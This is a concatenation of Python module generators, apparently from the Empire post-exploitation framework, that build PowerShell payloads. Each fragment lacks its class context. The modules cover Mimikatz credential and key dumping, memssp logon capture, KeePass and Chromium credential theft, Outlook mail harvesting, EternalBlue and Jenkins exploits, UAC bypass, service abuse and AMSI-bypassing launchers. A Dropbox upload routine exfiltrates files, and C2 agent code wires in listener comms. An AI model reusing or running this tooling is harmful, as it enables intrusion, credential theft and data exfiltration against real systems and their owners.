def generate(self, obfuscate=False, obfuscationCommand=""):
username = self.options['Username']['Value']
password = self.options['Password']['Value']
instance = self.options['Instance']['Value']
check_all = self.options['CheckAll']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLServerInfo.ps1"
script = ""
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(moduleSource, 'r') as source:
script = source.read()
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
scriptEnd = ""
if check_all:
ModuleSource = self.mainMenu.installPath + "data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
ModuleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
with open(ModuleSource, 'r') as auxSource:
auxScript = auxSource.read()
script += " " + auxScript
except:
print(helpers.color("[!] Could not read additional module source path at: " + str(ModuleSource)))
scriptEnd = " Get-SQLInstanceDomain "
if username != "":
scriptEnd += " -Username "+username
if password != "":
scriptEnd += " -Password "+password
scriptEnd += " | "
scriptEnd += " Get-SQLServerInfo"
if username != "":
scriptEnd += " -Username "+username
if password != "":
scriptEnd += " -Password "+password
if instance != "" and not check_all:
scriptEnd += " -Instance "+instance
scriptEnd = helpers.keyword_obfuscation(scriptEnd)
scriptEnd = helpers.keyword_obfuscation(scriptEnd)
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
script = f.read()
f.close()
scriptEnd = moduleName + " "
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-ClipboardContents.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Get-ClipboardContents"
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# add in the key dumping command
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::keys /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/Set-MacAttribute.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nSet-MacAttribute"
for option,values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += "| Out-String"
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
computername = self.options['ComputerName']['Value']
print(helpers.color("[+] Querying: " + str(computername)))
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-WinUpdates.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = " Get-WinUpdates"
scriptEnd += " -ComputerName "+computername
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1"
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# generate the launcher code without base64 encoding
l = self.mainMenu.stagers.stagers['multi/launcher']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
l.options['Base64']['Value'] = 'False'
launcherCode = l.generate()
# need to escape characters
launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'")
script += 'Invoke-MS16135 -Command "' + launcherCode + '"'
script += ';"`nInvoke-MS16135 completed."'
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the custom command with whatever options we want
command = "misc::memssp"
# base64 encode the command to pass to Invoke-Mimikatz
scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"
scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# extract all of our options
listenerName = self.options['Listener']['Value']
if listenerName not in self.mainMenu.listeners.activeListeners:
print(
helpers.color("[!] Listener '%s' doesn't exist!" %
(listenerName)))
return ''
activeListener = self.mainMenu.listeners.activeListeners[listenerName]
listenerOptions = activeListener['options']
script = self.mainMenu.listeners.loadedListeners[
activeListener['moduleName']].generate_comms(
listenerOptions=listenerOptions, language='powershell')
# signal the existing listener that we're switching listeners, and the new comms code
script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (
listenerName, script)
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath,
psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# set the purge command
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the custom command with whatever options we want
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
maxSize = self.options['MaxSize']['Value']
traceFile = self.options['TraceFile']['Value']
persistent = self.options['Persistent']['Value']
stopTrace = self.options['StopTrace']['Value']
if stopTrace.lower() == "true":
script = "netsh trace stop"
else:
script = "netsh trace start capture=yes traceFile=%s" % (traceFile)
if maxSize != "":
script += " maxSize=%s" % (maxSize)
if persistent != "":
script += " persistent=yes"
# Get the random function name generated at install and patch the stager with the proper function name
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath,
psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PrivescCheck.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script = moduleCode
scriptEnd = "Invoke-PrivescCheck"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeeThief.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = moduleCode
scriptEnd = "\nGet-KeePassDatabaseKey "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1"
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
script += "\nInvoke-EternalBlue "
for option, values in self.options.items():
if values['Value'] and values['Value'] != '':
if option.lower() == "shellcode":
# transform the shellcode to the correct format
script += " -" + str(option) + " @(" + str(
values['Value']) + ")"
else:
script += " -" + str(option) + " " + str(values['Value'])
script += "; 'Exploit complete'"
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
scriptCmd = "Invoke-X"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color(
"[!] Unable to open script at the configured path: " +
str(scriptPath)))
return ""
script = f.read()
f.close()
scriptEnd = "\n%s" % (scriptCmd)
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
folderName = self.options['FolderName']['Value']
maxEmails = self.options['MaxEmails']['Value']
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode + "\n"
scriptEnd = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" %(folderName, maxEmails)
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
scriptPath = self.options['ScriptPath']['Value']
scriptCmd = self.options['ScriptCmd']['Value']
script = ''
if (scriptPath != ''):
try:
f = open(scriptPath, 'r')
except:
print(
helpers.color(
"[!] Could not read script source path at: " +
str(scriptPath)))
return ""
script = f.read()
f.close()
script += '\n'
script += "%s" % (scriptCmd)
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath,
psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script = moduleCode
# extract all of our options
serviceName = self.options['ServiceName']['Value']
# generate the .bat launcher code to write out to the specified location
l = self.mainMenu.stagers.stagers['windows/launcher_bat']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
l.options['Delete']['Value'] = "True"
launcherCode = l.generate()
# PowerShell code to write the launcher.bat out
scriptEnd = ";$tempLoc = \"$env:temp\\debug.bat\""
scriptEnd += "\n$batCode = @\"\n" + launcherCode + "\"@\n"
scriptEnd += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
scriptEnd += "\"Launcher bat written to $tempLoc `n\";\n"
if launcherCode == "":
print(helpers.color("[!] Error in launcher .bat generation."))
return ""
scriptEnd += "Invoke-ServiceAbuse -ServiceName \"" + serviceName + "\" -Command \"C:\\Windows\\System32\\cmd.exe /C `\"$env:Temp\\debug.bat`\"\""
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Get-SystemDNSServer
{
<#
.Synopsis
Enumerates the DNS Servers used by a system
Part of Posh-SecMod (https://github.com/darkoperator/Posh-SecMod/)
Author: darkoperator
.DESCRIPTION
Enumerates the DNS Servers used by a system returning an IP Address .Net object for each.
.EXAMPLE
C:\> Get-SystemDNSServer
Address : 16885952
AddressFamily : InterNetwork
ScopeId :
IsIPv6Multicast : False
IsIPv6LinkLocal : False
IsIPv6SiteLocal : False
IsIPv6Teredo : False
IsIPv4MappedToIPv6 : False
IPAddressToString : 192.168.1.1
#>
$DNSServerAddresses = @()
$interfaces = [System.Net.NetworkInformation.NetworkInterface]::GetAllNetworkInterfaces()
foreach($interface in $interfaces)
{
if($interface.OperationalStatus -eq "Up")
{
$DNSConfig = $interface.GetIPProperties().DnsAddresses
if (!$DNSConfig.IsIPv6SiteLocal)
{
$DNSServerAddresses += $DNSConfig
}
}
}
$DNSServerAddresses
} Get-SystemDNSServer"""
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath,
psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-PortScan -noProgressMeter -f"
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}"
scriptEnd = helpers.keyword_obfuscation(scriptEnd)
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# Set booleans to false by default
Obfuscate = False
AMSIBypass = False
AMSIBypass2 = False
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
sysWow64 = self.options['SysWow64']['Value']
# staging options
if (self.options['Obfuscate']['Value']).lower() == 'true':
Obfuscate = True
ObfuscateCommand = self.options['ObfuscateCommand']['Value']
if (self.options['AMSIBypass']['Value']).lower() == 'true':
AMSIBypass = True
if (self.options['AMSIBypass2']['Value']).lower() == 'true':
AMSIBypass2 = True
# generate the launcher script
launcher = self.mainMenu.stagers.generate_launcher(
listenerName,
language='powershell',
encode=True,
obfuscate=Obfuscate,
obfuscationCommand=ObfuscateCommand,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds,
AMSIBypass=AMSIBypass,
AMSIBypass2=AMSIBypass2)
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
else:
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
if sysWow64.lower() == "true":
stagerCode = "$Env:SystemRoot\\SysWow64\\WindowsPowershell\\v1.0\\" + launcher
else:
stagerCode = "$Env:SystemRoot\\System32\\WindowsPowershell\\v1.0\\" + launcher
parts = stagerCode.split(" ")
script = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (
parts[0], " ".join(parts[1:]), listenerName)
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath,
psScript=script,
obfuscationCommand=obfuscationCommand)
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# Set booleans to false by default
Obfuscate = False
AMSIBypass = False
AMSIBypass2 = False
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if (self.options['Obfuscate']['Value']).lower() == 'true':
Obfuscate = True
ObfuscateCommand = self.options['ObfuscateCommand']['Value']
if (self.options['AMSIBypass']['Value']).lower() == 'true':
AMSIBypass = True
if (self.options['AMSIBypass2']['Value']).lower() == 'true':
AMSIBypass2 = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2)
if launcher == "":
print(helpers.color("[!] Error in launcher command generation."))
return ""
else:
#Cmd = launcher
print(helpers.color("Agent Launcher code: "+ launcher))
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nExploit-Jenkins"
scriptEnd += " -Rhost "+str(self.options['Rhost']['Value'])
scriptEnd += " -Port "+str(self.options['Port']['Value'])
scriptEnd += " -Cmd \"" + launcher + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# Set booleans to false by default
Obfuscate = False
AMSIBypass = False
AMSIBypass2 = False
listenerName = self.options['Listener']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if (self.options['Obfuscate']['Value']).lower() == 'true':
Obfuscate = True
ObfuscateCommand = self.options['ObfuscateCommand']['Value']
if (self.options['AMSIBypass']['Value']).lower() == 'true':
AMSIBypass = True
if (self.options['AMSIBypass2']['Value']).lower() == 'true':
AMSIBypass2 = True
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-BypassUAC.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate,
obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2)
if launcher == "":
print(helpers.color("[!] Error in launcher generation."))
return ""
else:
scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher)
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-DropboxUpload {
Param(
[Parameter(Mandatory=$true)]
[string]$SourceFilePath,
[Parameter(Mandatory=$true)]
[string]$TargetFilePath,
[Parameter(mandatory=$true)]
[string]$ApiKey
)
$url = "https://content.dropboxapi.com/2/files/upload"
$file = [IO.File]::ReadAllBytes($SourceFilePath)
[net.httpWebRequest] $req = [net.webRequest]::create($url)
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $ApiKey
$req.method = "POST"
$req.Headers.Add("Authorization", $authorization)
$req.Headers.Add("Dropbox-API-Arg", $arg)
$req.ContentType = 'application/octet-stream'
$req.ContentLength = $file.length
$req.TimeOut = 50000
$req.KeepAlive = $true
$req.Headers.Add("Keep-Alive: 300");
$reqst = $req.getRequestStream()
$reqst.write($file, 0, $file.length)
$reqst.flush()
$reqst.close()
[net.httpWebResponse] $res = $req.getResponse()
$resst = $res.getResponseStream()
$sr = new-object IO.StreamReader($resst)
$result = $sr.ReadToEnd()
$result
$res.close()
}
Invoke-DropboxUpload """
# Add any arguments to the end execution of the script
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(
values['Value'])
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = " Get-SharpChromium"
#check type
if self.options['Type']['Value'].lower() not in [
'all', 'logins', 'history', 'cookies'
]:
print(
helpers.color(
"[!] Invalid value of Type, use default value: all"))
self.options['Type']['Value'] = 'all'
scriptEnd += " -Type " + self.options['Type']['Value']
#check domain
if self.options['Domains']['Value'].lower() != '':
if self.options['Type']['Value'].lower() != 'cookies':
print(
helpers.color(
"[!] Domains can only be used with Type cookies"))
else:
scriptEnd += " -Domains ("
for domain in self.options['Domains']['Value'].split(','):
scriptEnd += "'" + domain + "',"
scriptEnd = scriptEnd[:-1]
scriptEnd += ")"
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
